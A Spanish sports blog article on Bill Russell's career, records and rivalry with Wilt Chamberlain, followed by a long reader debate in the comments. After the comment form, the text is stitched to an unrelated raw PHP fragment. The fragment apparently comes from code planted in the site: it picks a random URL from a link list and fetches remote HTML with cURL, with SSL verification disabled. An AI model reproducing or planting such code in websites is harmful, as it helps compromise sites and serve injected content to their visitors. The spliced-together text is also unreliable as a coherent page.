Bill Russell, el apodo del éxito

07 de December de 2010 por Sergio
Artículo 3 de 5 de la serie Grandes pívots de la historia

¿Cómo podríamos catalogar a un deportista de cualquier disciplina que ha conseguido ganar un 84% de los campeonatos que ha disputado? ¿Qué adjetivos aplicamos al único hombre capaz de parar a la mayor arma ofensiva que jamas jugó al baloncesto? ¿En qué lugar en la historia debería estar el jugador con más anillos? ¿Cómo se consiguen 5 premios de MVP de liga regular desde la defensa? Quizás el número de preguntas sin respuesta que inspira la figura de un jugador sea una forma apropiada de instaurar un orden a la hora de establecer rankings históricos entre jugadores.

William “Bill” Felton Russell nació en Louisiana a comienzos de 1934. Por desgracia, desde su infancia, el pequeño Will y su familia sufrieron el racismo imperante en la sociedad americana durante aquellos años de la historia estadounidense. Precisamente el estado de Lousiana (en el poco liberal Sur estadounidense) era uno de los estados más intolerantes. Su madre y su padre vivieron varios episodios de racismo por parte, incluso, de las autoridades y fuerzas del orden. Supongo que ni él mismo sabía que en un futuro se convertiría en una personalidad importante en la consecución de la igualdad de derechos y en un estandarte para la población de raza afroamericana. Debido a estos sucesos de desprecio, la familia decidió mudarse a Oakland, California. Poco después del traslado, su madre moría a los 33 años por complicaciones renales, quedando el joven a cuidado de su padre, principal referente de su vida y reconocido ídolo del gran jugador.

A pesar de conseguir 3 títulos estatales,  no sobresalió en la práctica del baloncesto hasta su temporada junior en el instituto. Debido a su tardía explosión deportiva, sólo una universidad se mostró interesada en contratar a Russell. Cuando aceptó la oferta de la Universidad de San Francisco, pudo compartir vestuario con otros posteriores jugadores NBA de raza negra como K.C. Jones. De hecho el equipo de USF fue el primero en presentar como titulares a 3 jugadores afromericanos: Russell, Jones y Hal Perry. Sin embargo, los insultos racistas no cesarían durante su estancia en la USF. Sirva como muestra el hecho de que se les prohibió la entrada a hoteles durante su concurso en el All-Star Tournament de Oklahoma City. Estas situaciones no lograron nunca minar la mentalidad de Russell, llevando a su Universidad a lograr dos títulos de la NCAA en los años 1954 y 1955, incluyendo una racha de 55 victorias consecutivas. Como él dijo: “nunca permití sentirme como una víctima”.

Su estatura, algo pequeña en comparación con jugadores actuales en la posición de pívot, era compensada con unas capacidades atléticas excepcionales en cuanto a velocidad y salto (compitió en algunas pruebas de atletismo por la USF como el salto de altura, concurso en el que fue considerado el 7º mejor saltador del mundo en 1956 por algunas revistas especializadas, con marcas de 2,06 metros, a sólo 6 centímetros del campeón olímpico), unos larguísimos brazos y una comprensión del juego inusual para un jugador  de su altura incluso de la actualidad. Sus promedios durante su etapa universitaria fueron de 20,7 puntos y 20,3 rebotes en 79 encuentros. De hecho, al igual que otros jugadores legendarios como Mikan, Chamberlain o Jabbar, propició cambios en el reglamento para intentar minimizar su dominio en el juego frente a jugadores similares.

Cuando finalizó su andadura en el baloncesto universitario, recibió ofertas de equipos como los Harlem Globetrotters, que fueron rechazadas para declararse elegible para el Draft de ese año 1956.

Gracias a la visión que siempre caracterizó a Auerbach a lo hora de reclutar jugadores para su equipo (Bob Cousy aparte), Russell acabó siendo elegido por los St.Louis Hawks para ser traspasado a los Celtics posteriormente a cambio del 6 veces All-star Ed Macauley y Cliff Hagan. Aparte de Russell, el equipo de Massachussets tambien logró hacerse con los servicios de K.C.Jones (su compañero en la universidad) y Heinsohn, realizando posiblemente las mejores elecciones que jamás hizo ningún equipo en la historia del Draft.

Antes de incorporarse a la disciplina de los Celtics, Russell participó en los Juegos Olímpicos de Melbourne como capitán del combinado americano, haciéndose con el oro tras aplastar a la URSS por 89-55. Su participación estuvo en la cuerda floja debido a que ya había firmado un contrato con los Celtics y se podía considerar que no era un amateur. Finalmente, Russell hizo valer su determinación y renunció a los primeros meses de competición en la NBA para no perderse el evento. En dicho torneo, Russell fue el máximo anotador de un combinado que ganó sus partidos por una media de 53 puntos. Años más tarde, Russell declararía que si no le hubieran dejado jugar a baloncesto hubiera participado en la prueba de salto de longitud.

En diciembre de 1956, Russell llegaba definitivamente a Boston donde venía a otorgar al equipo los atributos necesarios en materia defensiva de los que carecía un equipo en franca dinámica ascendente. Aquel equipo, con Cousy, Heinsohn, Russell y Bill Sharman, conseguiría aquella temporada el primero de los títulos que irían a parar a las vitrinas de los Celtics durante aquellos gloriosos años. Tras un agónico 7º partido en el que se tuvieron que jugar dos prórrogas para acabar derrotando a los Hawks de Bob Pettit, el primero de los anillos de Russell fue a parar a sus dedos. Curiosamente no se llevó al premio al rookie del año, que fue a parar a las manos de su compañero Tom Heinsohn.

Muchos jugadores y entrenadores de aquellos tiempos destacan como las capacidades defensivas y reboteadores de Russell no procedían de sus condiciones físicas, sino de su intensidad, agresividad, colocacion y anticipación. Nunca nadie hasta entonces, ni desde entonces, ha logrado dominar individualmente un deporte desde la defensa como lo hizo el “Señor de los Anillos”. Baste señalar que durante 7 temporadas consecutivas consiguió promedios superiores a los 23 rebotes capturados por partido.

Al año siguiente, la temporada 1957-1958, los Celtics conseguirían llegar de nuevo a las Finales de la NBA, en las que no pudieron conseguir un 2º anillo consecutivo debido, en parte, a la lesión que sufrió Russell durante el tercer partido de la ronda final. Aquel año Russell fue nombrado el jugador más valioso pero en cambio no entró en el mejor quinteto de la temporada. Este curioso fenómeno se repitió en más de una ocasión en las temporadas siguientes: alcanzó cinco veces el premio de mejor jugador de la regular pero sólo fue incluido 2 veces en el First-Team del campeonato.

La 58-59 fue la primera de las ocho temporadas consecutivas que vieron como los Celtics se alzaban con el campeonato. Ni siquiera la llegada a la liga el año siguiente de otro de lo más grandes, evitaría tal dictadura deportiva. Efectivamente, a partir de 1959  Russell coincidió en competición con Chamberlain, dando pie a una de las más grandes (si no la más) rivalidades existidas en el baloncesto americano. A pesar del debate existente entre que jugador era mejor, una frase del ex-entrenador Don Nelson, entonces compañero de Russell, vino a resumir las cualidades de cada uno en la pista: “Hay dos tipos de estrellas. Unos se hacen a sí mismo grandes a expensas de sus propios compañeros, y otros hacen mucho mejores a los jugadores que comparten cancha con él. Este es el tipo de jugador que era Russell”.

Al final de la temporada 62-63, los Celtics perdieron a Bob Cousy, retirado tras  13 exitosas campañas, pero  ya habían drafteado al que a la postre se convertiría en otro jugador histórico: John Havlicek. Los cambios no les afectaron lo más mínimo manteniendo sus impresionantes logros deportivos como hasta entonces lo habían hecho. Aquel año Russell consiguió su cuarto MVP de liga regular y su primer y único MVP del AllStar Game con una impresionante actuación de 19 puntos y 24 rebotes.

En las 2 siguientes temporadas, Bill Russell se alzó con el título de máximo reboteador del campeonato con más de 24 rebotes por noche. Fueron las 2 únicas ocasiones en las que un jugador que no se llamaba Wilt Chamberlain conseguía la gesta entre 1959 y 1973.  Esto dice mucho del de los Celtics y aun más de Wilt. En la 1964-1965, los Celtics se llevaron el 7º título consecutivo con el archiconocido robo de Havlicek en un apretadísimo final en el séptimo partido de la final de conferencia que los enfrentaba a los 76ers de Chamberlain. Y finalmente, en la temporada 65-66, Russell y los suyos se hicieron con el histórico octavo titulo consecutivo dejando en la cuneta, una vez más, a Wilt Chamberlain. Rusell promedió aquel año 22’8 rebotes. Era la primera vez desde hacía 7 años que bajaba de los 23.

En la temporada 66-67, Auerbach se retiró como entrenador, cediendo su sitio a Russell, que disputó tres campañas como jugador-entrenador y se convertió en el primer entrenador negro de la historia. El primer año, su némesis consiguió finalmente vencerle y llevarse el anillo. Fue la única vez (considerando que en 1958 se había lesionado) que Russell probó el amargo sabor de la derrota durante toda su carrera deportiva. Tras ese año,dos anillos más fueron a parar a la hemeroteca del equipo verde. Es muy recordada su actuación en las Finales de Conferencia de 1968 ante los 76ers. El equipo de Philadelphia dominaba la serie por 1-3, pero el genio de Louisiana consiguió limitar a Chamberlain a solo 2 intentos de campo en el siguiente partido, incrementando su aportación en los partidos restantes hasta conseguir su 10º anillo. Esa temporada sería elegido, a sus 34 años, deportista del año por la revista Sport Illustrated.

Su última temporada tuvo lugar el 1969, año en el conseguiría su último título al derrotar en la final a los Lakers de Baylor, West y Chamberlain. Aunque nadie les daba como favoritos esa temporada, pues terminaron 4º de su Conferencia con un récord de 48-34, consiguieron llegar a las Finales de la NBA frente al equipo angelino. Durante la disputa del séptimo partido, Wilt se lesionó y tras volver al banquillo durante la disputa del mismo partido, al estilo de lo que haría Willis Reed unos años más tarde, su entrenador prefirió no sacarlo a jugar en el resto del partido, yendo a parar el anillo a los dedos de los jugadores del Este. Era el undécimo para Russell.

Para comprender la importancia de la figura de Russell en los Celtics, podemos decir que al año siguiente de su retirada, los Celtics no consiguieron llegar a los playoffs por primera vez desde 1950.

Posteriormente entrenaría a Supersonics y Kings durante las décadas de los 70 y 80 respectivamente con humildes resultados salvo el hecho de llevar por primera vez a los Playoffs al equipo del estado de Washington.

Algunos hechos notables:

– Es, junto a Henri Richard, de la National Hockey League, el atleta con más títulos deportivos en cualquier disciplina deportiva americana.
– Posee 11 anillos de campeón de la NBA, récord recientemente igualado por Phil Jackson (1 como jugador y 10 como entrenador)
– Único jugador, junto a Wilt Chamberlain en conseguir al menos 50 rebotes en un partido.
– Primer entrenador afroamericano de la historia y primer jugador de raza negra en tener status de superestrella en la NBA.
– Da nombre al, posiblemente, trofeo individual más importante de la liga profesional americana de baloncesto, el MVP de las Finales o Bill Russell Award.
– El fue quién convenció a Shaquille O’neal y Kobe Bryant para que hicieran las paces tras las disputas que existieron al final de su etapa conjunta en el equipo californiano y que desembocaron en la salida del pívot rumbo a Miami.
– Su camiseta con el nº 6 cuelga de la cancha de los Celtics desde el año 1972, tan solo 3 años despues de su retirada.

… ¿¿Por cierto, alguien ha escuchado alguna vez la leyenda de donde se colocaba Russell el 11º anillo a falta de dedos en las manos?? Si la respuesta es no… mejor así.

Comenta

14 comentarios a esta entrada

  1. M dice:
    #1

    Impresionante. Muchas gracias, ha sido aún mejor de lo que me esperaba 🙂

      Citar

  2. M dice:
    #2

    Y añado, un ejemplo humano sensacional, jugando en una época dificilísima, sin recurrir al victimismo ni una sola vez, y con una cabeza amuebladísima. Sigue siendo un placer leer sus entrevistas.

      Citar

  3. Gallis dice:
    #3

    Fenomenal el artículo!!! La verdad es que siempre he pensado que Russell está, y espero que se me entienda bien, un poco infravalorado. Todo el mundo admite que es uno de los más grandes, en mi opinión está a la altura de los más más grandes, y eso es algo que ya mucha gente discute. Pero vamos, que no va más allá…me ha gustado mucho.

    Eso sí, una cosa, Phil Jackson tiene un anillo como jugador y 11 como entrenador, useasé, 12, jeje.

      Citar

  4. Denise dice:
    #4

    Gran Articulo una vez más.
    Si el otro dia, hablamos de que es casi imposible que alguien supere muchos de los records de Chamberlain, como el de los 100 puntos por partido, dudo mucho que alguien pueda igualar o superar los 11 anillos de Rusell como jugador.

      Citar

  5. Denise dice:
    #5

    queria decir….100 puntos en un partido,

      Citar

  6. sergio dice:
    #6

    Hombre… es que yo veo casi mas probable lo de los 100 puntos Denise

      Citar

  7. TheDeerHunter dice:
    #7

    Pues a mí me parece que lo de los 11 anillos no tiene porqué ser tan complicado igualarlo o superarlo…
    Jordan, sin mucho esfuerzo bien podría haber ganado 2 o 3 más ¿alguien lo duda? A nadie le debería sorprender que Kobe llevara uno o dos más y que además ganara de aquí a que se retire otros 2 o 3. Sería factible ¿no?
    Lo que es más complicado es que se reuna un equipo de tanto talento. Un equipo ganador hoy en día no podría tener acceso a un Havlicek, por ejemplo… o que de golpe te entren en un mismo draft el propio Russell, Heinsohn y KC Jones. Eso sí es una locura… y bien que hizo la liga corrigiendolo, porque el éxito de los Celtics no ayudó precisamente al desarrollo de la liga. Me recuerda un poco a lo que está pasando ahora en nuestra liga de futbol…

    Yo no veo a Russell infravalorado. Creo que posiblemente sea el mejor defensor de la historia y uno de los más grandes competidores de siempre, pero opino que la gente le otorga demasiado mérito en los anillos que ganó. Aquellos 11 anillos no los ganó Russell, los ganó el irrepetible equipo que fueron. Él simplemente fue el mejor pilar y el mejor cemento que un colectivo puede tener pero individualmente le faltaba un escalón (al menos) de talento ofensivo.
    En su nombre el verdadero crímen que se comete es olvidar a Cousy, Havlicek, Sam Jones, Sharman, Heinsohn, Howell… y un larguísimo etc. Y eso es precisamente lo que ha ocurrido.
    Si a Pau en estos Lakers se le llama hoy en día gregario me gustaría saber qué opinaría la gente cuando siempre habían 4 o 5 tíos que anotaban más (o mucho más) que Russell.

    Si la frase que empieza “Hay dos tipos de estrellas…” pretende infravalorar a Chamberlain como jugador egoísta la veo absoluta y llanamente equivocada en ese espíritu, porque Wilt también hacía mejores a sus compañeros además de inflarse él.
    Russell fue un jugador de un valor incalculable… pero siempre hubo otro pívot individualmente mejor que él. De ahí esa aparente paradoja en que él fuera el MVP pero no lo eligieran en el quinteto ideal de la liga.

      Citar

  8. sergio dice:
    #8

    Pues no estoy de acuerdo en la mayoría de las cosas Deer.

    No creo que nunca nadie llegue a los 11 anillos como jugador de Russell, y aún menos con el papel decisivo que siempre desempeño en el equipo. Como bien dices, Jordan, Kobe u otros pudieron o pueden llegar a los 8-9 anillos, pero me parece imposible que actualmente, con el sistema de gestión que existe en la competición. De hecho, como tu mismo dices mas tarde, no creo que nunca se concentren en una franquicia durante tan solo 5-6 años, gente como Havlicek, Cousy, Russell, Sam Jones, K.C Jones, Heinsohn,…. Puedes tener atino en ciertas elecciones (como Spurs esta decada), pero es muy dificil renovar la calidad de un Gasol, Bryant, Odom, Fisher, Garnett, Pierce, Allen mediante traspasos y elecciones. Es esa dificultad en la renovación lo que hace esta liga diferente a cualquiera europea.

    Amen de todo eso, recordar que Havlicek fue un nº9, Russell un 2 (el primero fue…Si Green??), Heinsohn fue una territorial pick, Sam Jones un 8, KC Jones un 14,…. es decir, aunque algunas parezcan elecciones altas, por ejemplo, una eleccion 14 era una segunda ronda en aquellos tiempos. Si gracias a los directivos se hicieron las cosas infinitamente mejor que el resto de franquicias….punto para ellos oye! Tampoco se yo que tenía q envidiar los Lakers o Boston de los 80 a los Celtics de los 60.

    Y en cuanto a la discusión Chamberlain-Russell, del mismo modo que argumentas que Wilt jamás tuvo el equipo que dispuso el Celtics, la adaptación de un Russell a un rol específico para ser el principal artífice de los exitos de su equipo tiene un mérito descomunal. Para mí, probablemente sea el 2º mayor caso de liderazgo tras Michael Jordan. Y me parece una falacia pensar que Russell no tenía capacidad ofensiva. Simplemente el sistema delegaba esa responsabilidad en otros jugadores. Los principales jugadores de entonces eran jugadores altos, y la capacidad de frenarles que pudiese tener Bill era la mayor anotación que podía aportar al equipo.

    Yo si pienso que Russell podía haber ganado anillos con un equipo algo interior al que tuvo. Por supuesto no establecer una dinastía de 8 títulos consecutivos, pero si llevarse unos cuantos. Recordemos que todos los equipos que consiguieron anillos tenian varias figuras en su roster. Chamberlain tambien contó con ellas y no lo consiguió. Y todo esto te lo dice alguien que prefiere la figura de Wilt a la del señor de los anillos.

    La frase “hay dos tipos de estrellas…” simplemente se debe leer como que exiten dos caminos al éxito. Quizás uno este más reconocido, pero no por ello es menos válido, Eso si, hemos comprobado muchas veces que la implicación del grupo facilita mucho los títulos. En este y en todos los deportes de equipo. Chamberlain, al igual que el actual Bryant, tardaron más tiempo en entender unos conceptos que para otros eran claros desde el principio.

      Citar

  9. TheDeerHunter dice:
    #9

    ¿una falacia?? Russell no llegaba ni de coña a un 50% en tiro y ese es un dato lamentable para un interior de la categoría que estamos manejando. No era una cuestión ni de roles, ni de adaptación, ni nada de eso. El problema no es que no lanzara, como así hizo y puso de manifiesto Wilt en alguna de sus etapas. Lo hacía mal. Es un hecho, Sergio. Tenía una mano terrible.
    No se trata de que Russell se adaptara a un rol específico… es que no había otro para él. Al menos sí podemos decir que fue el mejor en ello pero de no haber tenido tanto crack alrededor nunca hubiera estado capacitado para liderar a su equipo en esa faceta. Wilt no se podía permitir ese lujo, ni de coña… y Bryant, pues observa alguno de los partidos en los que más se le ha acusado de chupón y dime quién de sus compañeros podía ponerse a tirar del carro anotador.
    Estamos hablando de equipos con 4 o 5 hall o famers simultáneos y algunos otros nombres del más alto nivel. ¿Cómo podemos comparar eso con lo que tuvo Wilt o con los equipos de los 80?? Hubiera sido comparable si aquellos Celtics o aquellos Lakers, además de lo que tenían, hubieran contado con 2 de los mejores del equipo contrario. Así estaríamos hablando de algo parecido.
    Russell basó su carrera en parar al que tenía en frente, cojonudo. También tuvo la suerte de que otros paraban al West de turno, al Robertson, al Baylor… pero había que parar a uno o dos como mucho en todos los rivales de los Celtics. Contra ellos había que parar a 5!!! y eso desde luego estaba fuera de la competencia de uno sólo. Algo sin parangón.

    Y como decía, aún asumiendo que hoy no se pueden confeccionar equipos como aquellos (sin quitarle méritos a la labor del equipo técnico… aunque la coña que tuvieron también es mítica) Kobe con un poco más de suerte llevaría ya 7 anillos, habiendo sufrido la travesía por el desierto varios años, cosa que no ocurrió con Russell. Puede ganar algunos más. Si Kobe se pone en 9 o más anillos quedará demostrado que se puede superar esa cifra e incluso puede que nosotros lo veamos. No creo que Kobe sea el último de su estirpe.
    Si Magic no se hubiera infectado de sida o Jordan hubiera sido más constante en activo estoy seguro que hubieramos visto esa cifra de anillos o muy cerca.

      Citar

  10. sergio dice:
    #10

    Puntualicemos Deer. Tener un porcentaje de tiro inferior al 50% durante los 60 no era, ni mucho menos, sinónimo de tener mala muñeca (que la tenía). De hecho, el primer jugador en la historia que superó el 50 en porcentaje de campo fue Chamberlain en la 60-61. Para mas inri, Russell estuvo durante 4 temporadas consecutivas entre los 5 primeros en nivel de acierto (56-60). Por todo eso digo que es más una leyenda que de verdad fuera cierto que era nulo en ataque. Una media durante su carrera de 15 puntos tampoco me parece despreciable.

    Estoy de acuerdo con que necesitaba uno o varios anotadores en su equipo para alcanzar esas cotas de éxito. Tambien comparto la opinión de que el nivel de responsabilidad en los casos de Kobe y Wilt era inmensamente superior, pero nada de ello minimiza lo más mínimo la importancia de Russell en la historia.

    Además, creo que de los 5 o 6 Hall of Famers de aquella época, sólo 3 o 4 (Russell, Cousy, Havlicek, Sharman o Heinsohn seguramente) podían estar considerados como los mejores en su posición individualmente. Era el grupo lo que les hacía grandes. Si reduces el papel de Russell porque tenía a tantos Hall of Famers, debes hacerlo aún mas reduciendo la importancia de esos jugadores sin el 6 de los verdes. Era un equipo pensado y compensado, no hecho de estrellas. No eran los Miami de estos dos meses atrás, era los Celtics de estos 2 o 3 años. Hacían circular el balón, era intensos, estaban bien dirigidos y liderados… no hay Chamberlain ni estrella que pueda con eso.

    Tambien se habla de que Wilt no jugó con grandes jugadores. Mentira. No se yo quien es el guapo que no menciona a Arizin, Greer, Cunningham, Chat Walker, West, Baylor, Hairston o Goodrich no merecieran menos reconocimiento individual. No ganaron títulos, pero sus estadísticas son iguales o mejores que la mayoría de jugadores verdes. El problema era el concepto de juego, la forma de entender el grupo y hacerlo de cada jugador un engranaje que moviese al resto. Bill Russell era el principal elemento.

    No entiendo que tiene que olvidar un 5 inicial formado por Archibald-McHale-Bird-Parish-Maxwell + Ainge o Jabbar-Magic-Worthy-Cooper-McAdoo-Scott a esos Celtics de los 60. Yo veo 4 o 5 Hall of Famers tambien. Y los 60 tampoco es que fuesen un periodo de malos jugadores. Hubo temporadas hasta con 6 jugadores por encima del 30-10.

    Obviamente tampoco es que Russell estuviera solo en defensa. Satch Sanders y KC Jones han pasado a la historia como magníficos defensores. Y por supuesto que tuvo mucha suerte de no coincidir nunca con un bajón de efectivos en la franquicia de Massachusets. Ya te digo que yo prefiero a Wilt o Kareem antes que a Bill, pero no por eso pienso quitarle el más mínimo valor a todos los apartados en los que este hombre ayudaba a su equipo (tampoco esta mal recordar que estuvo 4 o 5 años entre los mejores asistentes de la competición)

    Llamame incredulo pero no creo q nadie llegue a esos 11 anillos. Demasiados condicionantes durante una larga y fructifera carrera tienen q producirse para ello. Ah! y por supuesto no me refiero a 11 anillos al estilo Horry, Fisher, Kukoc o Sam Jones. Me refiero a alcanzarlos con el maximo nivel de juego.

      Citar

  11. TheDeerHunter dice:
    #11

    Lo último que querría hacer es menospreciar la genial figura de Bill Russell. Estoy hablando de un aspecto muy concreto en el que objetivamente pierde en la comparación con los otros monstruos con los que estamos obligados a medirle.
    No estoy diciendo que fuera nulo en ataque… bueno, quizás sí podríamos hacerlo en comparación con esos otros gigantes. En concreto Wilt es coetáneo suyo, así que no tiene porqué ser una excusa el factor época para valorar a ambos en ese sentido. Adicionalmente hablar de 15 ppp cuando el otro podía hacer 50 pues… Y vamos, que sea como sea era el 4º o 5º espada del equipo, así que tú me dirás.

    Después:
    -Año 57: Quinteto íntegro de Hall of Famers: Cousy-Sharman-Ramsey-Heinsohn-Russell; 3 de ellos entre los 50 mejores oficiales;
    -58: Los mismos + Sam Jones (6 hof+4 50’s)
    -59 hasta 62: Los mismos + KC Jones (7 hof y subiendo)
    -63: sale Sharman pero entran Havlicek y Clyde Lovelette (8 hof y 4 50’s!!!!)
    ….
    ¿Que no era un equipo de estrellas?? !Pero si no había ni dios en ese equipo que no fuera una estrella y tenían en todo momento 3 o 4 super-estrellas!!! No es que fueran los mejores, cada uno en su posición en ese momento… es que pudieron entrar en discusión de los mejores de la historia en su posición sin desmerecer demasiado!! Si los Heat son una puñetera banda de paquetes comparada con aquellos!!!
    Como mucho te admito que para haber tanto gallo lo supieron llevar muy bien. No me cabe duda de que cualquier equipo de la historia tenía múltiples razones para envidiarles.
    Si mencionas a Arizin, Greer, Cunningham y el resto… deberían haber jugado todos al mismo tiempo para igualar (si acaso) la batería con la que contaba Bill. Pero, ¿con cuantos de ellos coincidió simultáneamente y en un periodo extenso de tiempo? De hecho Arizin no me suena ni que coincidieran, pero bueno…

      Citar

  12. sergio dice:
    #12

    Arizin coincidió con Wilt en sus primeros años en Philadelphia Warriors. Creo que estuvo siempre por encima de los 22 puntos y 7 rebotes… pero el resto era un solar.

    Yo lo que digo respecto al roster de los Celtics es que probablemente sea el beneficio del conjunto lo que los hizo Hall of Famers. Hay muchos jugadores con mejores estadísticas individuales pero ninguno con su palmarés. De forma un tanto bruta es como decir que Horry era mejor que Barkley o Malone. Piensa que a lo mejor Fisher o Horry (siento cebarme con ellos porque me encantan pero son ejemplos recientes) entran en el Hall of Fame y Grant Hill, Spencer Haywood, Artis Gilmore, McGinnis , Bernard King (que quizas entre este año), World B Free, Vandeweghe, Mark Aguirre, Mel Daniels….. no entrarán nunca. Muchos de esos jugadores verdes le deben mas a Bill Russell que viceversa. No creo que Sam Jones, Heinsohn, KC,… esten entre los mejores individualmente en su puesto. Solo se les considera por su palmarés (cosa muy valida desde luego).

    Puedes decir que Russell era el 4º o 5º jugador ofensivo, pero su importancia en pista era mayor que la de cualquiera de sus compañeros. Que se beneficiaba de ello? correcto. Que no era individualmente comparable a otros? mas que probable. Pero la cantidad de intangibles que aportaba lo hacen subir tantos puestos como pueda ser posible. Y sigo creyendo que sin sus compañeros de equipo no hubiese ganado tantos títulos pero sus estadísticas se hubiesen incrementado mucho. Siempre o casi siempre ha ocurrido asi.

    De todos modos, si lo que cuentas es la diferencia en algunos aspectos comparado a otros de los grandes pivots de la historia… tienes toda la razón, pero todos esos también estaban muy por detrás de Bill en otros tantos.

      Citar

  13. TheDeerHunter dice:
    #13

    Heinsohn hacía 20-10 con la gorra y Sam Jones promedió 18-5 y 2.5 asistencias. No son lo que se dice gregarios al uso. Igual si no hubieran estado en aquel equipo serían ellos los que habrían promedidado mucho más.
    No creo que tenga tanto que ver los títulos que ganaron con el equipo de “magníficos” que formaban. No sé si tanto para ser mejores individualmente hablando que alguno de los “irregulares” que mencionas pero sí para discutirles muchas cosas. Y no veo porqué razón es concretamente a Bill Russell a quien deben agradecer su inclusión en los distintos honores que atesoran.

    Lo de que su importancia era mayor en pista que la de cualquiera de sus compañeros también lo podríamos llegar a discutir un poquito, estando Cousy, Havlicek y Sharman de por medio. Quizá fuera mayor… pero no mucho mayor. Su importancia sólo era realmente decisiva para parar a Wilt.. para el resto de cosas se sobraban ellos solos.

    En lo único que Bill Russell gana claramente a los otros grandes pívots que me refiero es en los títulos. Y esto es un aspecto que como bien insinúas referido a otros tiene por fuerza que pesar menos en esta discusión de corte individual porque es un dato excesivamente condicionado en su caso a las plantillas que disfrutó.

      Citar

  14. sergio dice:
    #14

    Otra mentira a medias es pensar que siempre pudo detener a Wilt Chamberlain. En los 142 partidos en los que se enfrentaron Wilt se fue a los 28,7 puntos y 28,7 rebotes con 57 victorias. Durante los primeros años le endosó 7 veces más de 50 puntos e incluso se fue a los 62 puntos en 1962. A Wilt no lo paraba nadie… para que nos vamos a engañar.

    Bill para mi, aparte de en títulos, ganaba en liderazgo, intensidad, defensa y capacidad de involucrar a sus compañeros aun habiendo ganado 8 títulos y sin nada que demostrar.

    Por cierto, la lista de jugadores que te he nombrado antes no son demasiado irregulares. Sus promedios estadisticos y sus periodos de 6 o 7 años con una valoracion similar los tuvieron casi todos.

    Esta claro que vemos las cosas un poco diferentes pero ya t digo que para mí probablemente Bill tampoco sea ni mucho menos el mejor pívot de la historia. Yo me permitiría el lujo de ponerlo tras Jabbar, Wilt e incluso Olajuwon (a ver lo que me llueve por decir q me gusta mas Hakeem jajaj)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>